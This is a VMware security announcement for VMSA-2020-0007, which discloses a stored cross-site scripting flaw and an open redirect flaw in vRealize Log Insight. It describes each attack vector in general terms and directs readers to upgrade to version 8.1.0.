VMware Security Announcement VMSA-2020-0007

Today VMware released VMSA-2020-0007. This affects VMware vRealize Log Insight and addresses Cross Site Scripting (XSS) and Open Redirect vulnerabilities (CVE-2020-3953, CVE-2020-3954). Links to the patch information and download will be provided at the end of the post.

Impacted Products

VMware vRealize Log Insight

Cross Site Scripting (XSS) and Open Redirect vulnerabilities in vRealize Log Insight were privately reported to the VMware Security Response Center. Updates are available to remediate these vulnerabilities in vRealize Log Insight.

Cross Site Scripting (XSS) vulnerabilities in vRealize Log Insight due to improper Input validation (CVE-2020-3953)

Description:
vRealize Log Insight does not properly validate user input, resulting in XSS vulnerabilities. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.4.

Known Attack Vectors:
A malicious actor with permissions equivalent to the predefined 'user' role may be able to add a malicious payload via the Log Insight UI which would be executed when the victim (another user or administrator) views this data in the UI (Stored XSS). Successful exploitation of this issue may result in a compromise of the victim's workstation.

Resolution:

To mitigate this install version 8.1.0 of vRealize Log Insight. There are no workarounds for older versions.

Open Redirect vulnerability in vRealize Log Insight due to improper Input validation (CVE-2020-3954)

Description:
vRealize Log Insight does not properly validate user input, resulting in an Open Redirect vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.1.

Known Attack Vectors:
A malicious actor may be able to perform a phishing attack by sending a seemingly trusted URL for a vRLI deployment to a victim. Upon opening this URL the victim will be redirected to a location of the attacker's choosing. Successful exploitation of this issue may result in a compromise of the victim's workstation.

Resolution:

To mitigate this install version 8.1.0 of vRealize Log Insight. There are no workarounds for older versions.

Fixed Version(s) and Release Notes:

vRealize Log Insight 8.1.0:

https://my.vmware.com/web/vmware/info/slug/infrastructure_operations_management/vmware_vrealize_log_insight/8_1

Link to VMware advisory

https://www.vmware.com/security/advisories/VMSA-2020-0007.html

Happy Patching!